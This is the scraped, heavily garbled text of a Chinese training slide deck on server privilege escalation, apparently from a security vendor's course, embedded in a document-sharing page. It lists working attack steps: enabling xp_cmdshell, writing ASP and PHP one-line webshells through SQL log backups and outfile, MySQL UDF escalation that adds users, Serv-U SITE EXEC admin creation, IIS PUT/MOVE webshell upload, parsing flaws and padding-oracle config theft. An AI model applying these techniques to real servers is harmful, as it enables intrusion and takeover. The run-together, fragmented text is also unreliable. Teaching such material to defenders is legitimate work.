![實(shí)驗(yàn)課件三方應(yīng)用提權(quán)_第1頁](http://file4.renrendoc.com/view3/M03/1C/0E/wKhkFmYWuvaAI9f_AAEnvcosUhI001.jpg)
![實(shí)驗(yàn)課件三方應(yīng)用提權(quán)_第2頁](http://file4.renrendoc.com/view3/M03/1C/0E/wKhkFmYWuvaAI9f_AAEnvcosUhI0012.jpg)
![實(shí)驗(yàn)課件三方應(yīng)用提權(quán)_第3頁](http://file4.renrendoc.com/view3/M03/1C/0E/wKhkFmYWuvaAI9f_AAEnvcosUhI0013.jpg)
![實(shí)驗(yàn)課件三方應(yīng)用提權(quán)_第4頁](http://file4.renrendoc.com/view3/M03/1C/0E/wKhkFmYWuvaAI9f_AAEnvcosUhI0014.jpg)
![實(shí)驗(yàn)課件三方應(yīng)用提權(quán)_第5頁](http://file4.renrendoc.com/view3/M03/1C/0E/wKhkFmYWuvaAI9f_AAEnvcosUhI0015.jpg)
版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)
文檔簡介
溢出攻溢出攻擊與提啟明星辰培訓(xùn)認(rèn)證部—王新目目提權(quán)演提權(quán)演示——SQL3提權(quán)演提權(quán)演示——運(yùn)行SQLTools,輸入目標(biāo)服務(wù)器IP、用戶名和4提權(quán)演示提權(quán)演示——(在客戶端SSMS中執(zhí)行EXECsp_configure'showadvancedoptions',1--RECONFIGUREWITHOVERRIDE-EXECsp_configure'xp_cmdshell',1-EXECsp_configureoptions',0--5提權(quán)演示——dbccaddextendedproc提權(quán)演示——dbccaddextendedprocdbccaddextendedproc("xp_cmdshell","xplog70.dll")沙盒提權(quán):(更多命令參考‘SQL修復(fù)資料.txt’)execmaster..xp_regwriteSelect*??????windows\system32\ias\ias.mdb','selectusersql$123/add")');Select*From?windows\system32\ias\ias.mdb','selectlocalgroupadministratorssql$6提權(quán)演提權(quán)演示——7提權(quán)演提權(quán)演示——混客SQL利用工具8提權(quán)演示——提權(quán)演示——點(diǎn)“設(shè)置”,連接SQL9提權(quán)演提權(quán)演示——提權(quán)演提權(quán)演示——提權(quán)演示——提權(quán)演示——利用日志增量備份寫入一句話';alterdatabasevenussetRECOVERYFULL--';createtablecmd(aimage)--';backuplogvenustodisk='f:\cmd'with-';insertintocmd(a)values';backuplogvenustodisk‘c:\www\shell.asp'-??????提權(quán)演提權(quán)演示——提權(quán)演提權(quán)演示——提權(quán)演示——提權(quán)演示——提權(quán)演示——提權(quán)演示——??mysql>usemysql>updateusersethost='%'wheremysql>flushC:\ProgramFiles\MySQL\MySQLServer??提權(quán)演示——提權(quán)演示——Usecreatetablevenus_tmp(cmdinsertintovenus_tmpvalues("<%executerequest("textarea1")%>");select*venus_tmpintoMySQL——udf提權(quán)步Udf.php已經(jīng)將udf.dll以二進(jìn)制的形式集成進(jìn)了phpMySQL——udf提權(quán)步Udf.php已經(jīng)將udf.dll以二進(jìn)制的形式集成進(jìn)了phpudf提權(quán)命c(diǎn)reatetablet_tmp(abcudf提權(quán)命c(diǎn)reatetablet_tmp(abcinsertintot_tmp??????createtablet_tmp(dataLONGBLOB);insertintot_tmpvalues("");updatet_tmp ??select*fromt_tmpintodumpfilecreatefunctioncmdshellreturnsstringsoname'udf.dll';selectcmdshell('netuseraa/add');droptableifexists?????select*fromt_tmpintodumpfileudf提權(quán)命要注意命udf提權(quán)命要注意命令中的字符都是英文字//版selectselect//版//查看mysql安裝路show//看各種變量ADS與ADS與對于5.1以上版本,默認(rèn)不存在\lib\pluginselect'xxx'intooutfileMysql提Mysql提Udf提Udf提權(quán)-linux平createtablet_tmp(datainsertintot_tmpupdatet_tmpset ;Udf提權(quán)-linux平Udf提權(quán)-linux平3.得到plugin目showvariableslikeplugin_dir/usr/local/mysql/lib/mysql/pluginselectdatafromt_tmpintoDUMPFILECREATEFUNCTIONsys_evalRETURNSstringSONAME'lib_mysqludf_sys.so';selectsys_eval('ls-l?????????提權(quán)演提權(quán)演示——useuseauxiliary/scanner/mysql/mysql_versionuseauxiliary/scanner/mysql/mysql_loginuseauxiliary/scanner/mysql/mysql_hashdumpuseauxiliary/admin/mysql/mysql_enum(CVE-2012-2122MySQL驗(yàn)證繞過,256??Phpmyadmin提權(quán)思Phpmyadmin提權(quán)思CreateTABLEvv(cmdtextNOTNULL);InsertINTOvv(cmd)VALUES('<?phpselectcmdfromvvintooutfileDropTABLEIFEXISTSvv;???????Phpmyadmin提權(quán)思createtablePhpmyadmin提權(quán)思createtabletemp_mix(datainsertintotemp_mixvalues????updatesetselect*fromtemp_mixinto'C:\\Windows\\System32\\udf.dll';-- createfunctioncmdshellreturnsstringsonameselectcmdshell('netuseraa/add');droptableifexiststemp_mix;????Oracle提默Oracle提默認(rèn)用戶scott/tiger,具有resource利用sql注入將scott提權(quán)至創(chuàng)建PL/SQL過程執(zhí)行系統(tǒng)命execmongodbmongodb提PHPMoAdmincurl"/moadmin.php"-d提權(quán)提權(quán)演示——制權(quán)提權(quán)演提權(quán)演示——破解很簡單提權(quán)演示——??提權(quán)演示——??經(jīng)典的輸入法漏洞,SQLServer???提權(quán)演提權(quán)演示——端口可以利用4899弱口令掃描器掃出弱口提權(quán)演示提權(quán)演示——端口提權(quán)演提權(quán)演示——提權(quán)演提權(quán)演示——利用vnc_passview獲取vnc的管理口提權(quán)提權(quán)演示——Serv-利用X-Scan發(fā)現(xiàn)Serv-U的一個弱口:Amdin+admin,此賬戶有執(zhí)行權(quán)提權(quán)命令QuotesiteexecnetusertestQuotesiteexecnetlocalgroupadministratorstest/add提權(quán)演提權(quán)演示——Serv-提權(quán)演提權(quán)演示——Serv-提權(quán)演提權(quán)演示——Serv-默認(rèn)管理賬戶默認(rèn)管理密碼默認(rèn)綁定提權(quán)演提權(quán)演示——Serv-兩種提權(quán)辦法一是利用提權(quán)演提權(quán)演示——Serv-兩種提權(quán)辦法提權(quán)演提權(quán)演示——Serv-遠(yuǎn)程連接時注意端口填寫fpipe打開提權(quán)演示——Serv-提權(quán)演示——Serv-下載文件提權(quán)演示——Serv-提權(quán)演示——Serv-CdLcdPutServUDaemon.ini賬戶權(quán)限:e—執(zhí)行pHfs-2.x遠(yuǎn)Hfs-2.x遠(yuǎn)程代碼執(zhí)Hfs2.3DFileZilla提FileZilla提提權(quán)演提權(quán)演示——IIS權(quán)限不提權(quán)演提權(quán)演示——IIS寫權(quán)限利利用IISPUTScaner可以批量掃描提權(quán)演提權(quán)演示——IIS寫權(quán)限利工具:老兵的IIS寫權(quán)限利用工Options選項(xiàng)可以查看IIS支持的操提權(quán)演提權(quán)演示——IIS寫權(quán)限利利用PUT直接寫一個一句話木提權(quán)演提權(quán)演示——IIS寫權(quán)限利再用MOVE命令將test.txt修改為提權(quán)演提權(quán)演示——IIS寫權(quán)限利成功利用一句話后提權(quán)演示——IIS6解提權(quán)演示——IIS6解析漏1.muma.asp;jpg文件名有分號路徑名含有有個條件:文件上傳后,不會被重命提權(quán)演示提權(quán)演示——IIS7提IIS7的提權(quán)0day,針對MS10-065-KB2124261-KB2271195-CVE-2010-提權(quán)提權(quán)演示——Tomcat漏洞Tomcat漏洞利用工ApacheTomcatCrack自動化攻擊工具Tomcat批量Tomcat批量抓雞工提權(quán)演提權(quán)演示——Deployments>ManageDeployments>Add提權(quán)演提權(quán)演示——遠(yuǎn)程代碼執(zhí)行phpjboss.php2提權(quán)演提權(quán)演示——遠(yuǎn)程代碼執(zhí)行,工具JexBoss-JbossverifyandEXploitation提權(quán)演提權(quán)演示——Java反序列化,遠(yuǎn)程代碼執(zhí)行提權(quán)演提權(quán)演示——Java反序列化,反彈提權(quán)演提權(quán)演示——提權(quán)演提權(quán)演示——提權(quán)演提權(quán)演示——WebLogicServerAdministrationConsoleworkshopDeploymentsWeb?????????提權(quán)提權(quán)演示——Elasticsearch提Elasticsearch提Elasticsearch遠(yuǎn)程代碼執(zhí)paddingpaddingPaddingoracle(MS10-070)漏洞檢測信息泄露、敏感文件讀取,例如paddingpadding查看源碼搜索WebResource.axd,找到然后,利用padBuster.pl計(jì)算Web.configZKonHQe3MWyTFog2IVA9Sj-ZKonHQe3MWyTFog216-encoding3-plaintext"|||~/Web.config“paddingpaddingrLCZG3p5Vx7zNIkXvQHI9QAAAAAAAAAAAAAAAAAAAAA116得到最終的秘鑰:(時間比較長提權(quán)示提權(quán)示例——搜狗拼搜狗拼音有一個問題提權(quán)示提權(quán)示例——搜狗拼此目錄下有一個升級程序提權(quán)示例——CVE2012-提權(quán)示例——CVE2012-cve:2012-useSetSetlhost提權(quán)示例——JavaRMI提權(quán)示例——JavaRMIServerInsecureDefaultJavaCodeExecutionuseSet提權(quán)示例——提權(quán)示例——提權(quán)提權(quán)示例——Solaris10條件:Solaris10/11的telnet服務(wù)開命令:telnetlfroot可以繞過驗(yàn)證直接以root身份登vsFTPsmilefacetelnetvsFTPsmilefacetelnetpass另一個終端:-(注意分telnetcat提權(quán)演示—Apache解析提權(quán)演示—Apache解析漏ext2和ext1沒有定從后向前依次按擴(kuò)展名嘗試解析文提權(quán)演提權(quán)演示——紅色為手工添加的部分,圖片被作為腳本解析提權(quán)演提權(quán)演示——Nginx的%00解析漏洞低版本nginx,可以在文件名后面,添加php-cgi默認(rèn)php-cgi默認(rèn)配置漏IISNginxCGIphp的web應(yīng)用程序,而Apache
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 加工安裝服務(wù)合同范本
- 別墅家具購買合同范本
- 公司舊車銷售合同范例
- 乙方工地材料合同范例
- 養(yǎng)生館共享店鋪合同范例
- 電源防雷插座板行業(yè)深度研究報告
- 中國電動拉鉚槍項(xiàng)目投資可行性研究報告
- led設(shè)備購買合同范本
- 制種水稻合同范本
- 公司外聘員工合同范例
- 2023年上海青浦區(qū)區(qū)管企業(yè)統(tǒng)一招考聘用筆試題庫含答案解析
- 2023版押品考試題庫必考點(diǎn)含答案
- 植物之歌觀后感
- 空氣能熱泵安裝示意圖
- 建筑工程施工質(zhì)量驗(yàn)收規(guī)范檢驗(yàn)批填寫全套表格示范填寫與說明
- 2020年中秋國慶假日文化旅游市場安全生產(chǎn)檢查表
- 昆明天大礦業(yè)有限公司尋甸縣金源磷礦老廠箐-小凹子礦段(擬設(shè))采礦權(quán)出讓收益評估報告
- 心有榜樣行有力量 -從冬奧冠軍徐夢桃身上感受青春奮斗初中主題班會
- GB/T 3860-1995文獻(xiàn)敘詞標(biāo)引規(guī)則
- 七年級英語下冊閱讀理解10篇
- 設(shè)計(jì)質(zhì)量、進(jìn)度保證措施
評論
0/150
提交評論